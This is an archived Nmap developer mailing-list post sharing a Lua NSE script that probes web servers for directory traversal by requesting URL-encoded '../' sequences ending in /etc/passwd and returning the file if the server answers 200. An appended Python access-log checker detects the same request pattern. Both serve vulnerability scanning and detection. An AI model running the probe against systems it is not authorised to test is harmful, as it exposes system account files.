Nmap Development mailing list archives

[NSE Script] HTTP probe for /etc/passwd


From: Kris Katterjohn <katterjohn () gmail com>
Date: Fri, 20 Jul 2007 19:34:04 -0500

Hey everyone!

I attached HTTPpasswd.nse, which is a script to probe for /etc/passwd through HTTP servers that are susceptible to directory traversal.

It's my first script that actually does something, so any comments are welcome and appreciated.

Thanks,
Kris Katterjohn
-- HTTP probe for /etc/passwd
-- 07/20/2007

-- Started with Thomas Buchanan's HTTPAuth.nse as a base

id = "HTTP /etc/passwd probe"

description = "Probe for /etc/passwd if server is susceptible to directory traversal"

author = "Kris Katterjohn <katterjohn () gmail com>"

license = "Look at Nmap's COPYING"

categories = {"intrusive"}

require "shortport"

portrule = shortport.port_or_service({80, 8080}, "http")

action = function(host, port)
        local socket
        local cmd, response
        local status

        socket = nmap.new_socket()

        -- Give up quietly if the TCP connection cannot be established
        status = socket:connect(host.ip, port.number)
        if not status then
                return
        end

        -- Ten URL-encoded "../" segments followed by "etc/passwd"
        cmd = "GET " .. string.rep("%2E%2E%2F", 10) .. "etc%2Fpasswd HTTP/1.0\r\n\r\n"

        socket:send(cmd)

        response = ""

        while true do
                local lines
                status, lines = socket:receive_lines(1)

                if not status then
                        break
                end

                response = response .. lines
        end

        socket:close()

        -- I thought about doing string.match(response, "HTTP/1.- 4") to see
        -- if it's bad, but I figure I'll check for success instead

        -- Match a status line like "HTTP/1.0 200 OK" at the start of the
        -- response. "." and "-" are pattern metacharacters in Lua, so the
        -- version is matched with "%." and "%d" and the match is anchored
        -- with "^" so a stray " 2" in a 404 body cannot trigger it.
        if string.match(response, "^HTTP/1%.%d 2%d%d") then
                -- The body begins right after the blank line ending the headers
                local start, stop = string.find(response, "\r\n\r\n")
                if stop then
                        return string.sub(response, stop + 1)
                end
        end

        return
end


_______________________________________________
Sent through the nmap-dev mailing list
http://cgi.insecure.org/mailman/listinfo/nmap-dev
Archived at http://SecLists.Org
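As an added, defender-side illustration that is not part of the original post or of Nmap: a small Python checker that finds the request pattern this script sends (runs of percent-encoded "../" ending in /etc/passwd) in web-server access-log lines, decoding nested percent-encoding before normalising the path and rating a 200 response to such a request higher than a failed attempt. The sample log lines, the SENSITIVE watch-list and the verdict names are assumptions made for the example.

```python
import posixpath
import re
from urllib.parse import unquote

# Constructed sample access-log lines (Common Log Format); not from the original post.
SAMPLE_LOG = """\
203.0.113.7 - - [20/Jul/2007:19:34:04 -0500] "GET /index.html HTTP/1.0" 200 512
203.0.113.7 - - [20/Jul/2007:19:34:05 -0500] "GET %2E%2E%2F%2E%2E%2F%2E%2E%2Fetc%2Fpasswd HTTP/1.0" 200 1187
203.0.113.7 - - [20/Jul/2007:19:34:06 -0500] "GET /img/%252e%252e/%252e%252e/etc/passwd HTTP/1.0" 404 210
198.51.100.2 - - [20/Jul/2007:19:35:00 -0500] "GET /docs/../docs/readme.txt HTTP/1.0" 200 99
"""

SENSITIVE = {"/etc/passwd", "/etc/shadow", "/proc/self/environ"}  # assumed watch-list
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')

def decode_fully(target, max_rounds=3):
    """Percent-decode until the string stops changing, so %252e (double-encoded '.') is caught."""
    for _ in range(max_rounds):
        decoded = unquote(target)
        if decoded == target:
            break
        target = decoded
    return target

def root_escapes(path):
    """How many levels the request climbs above the document root (0 = never leaves it)."""
    depth, lowest = 0, 0
    for seg in re.split(r"[\\/]+", path):
        if seg == "..":
            depth -= 1
            lowest = min(lowest, depth)
        elif seg not in ("", "."):
            depth += 1
    return -lowest

def classify(line):
    """Return (verdict, normalised_target, status), or None if the line carries no request."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    decoded = decode_fully(m.group("target"))
    normalised = posixpath.normpath("/" + decoded.lstrip("/"))
    status = int(m.group("status"))
    escapes = root_escapes(decoded)
    if escapes and normalised in SENSITIVE and status == 200:
        return ("traversal-likely-succeeded", normalised, status)
    if escapes:
        return ("traversal-attempt", normalised, status)
    return ("benign", normalised, status)
```

Run `classify` over each line of a real access log and alert on the first two verdicts; the second one is the case this script's probe would produce against a vulnerable server.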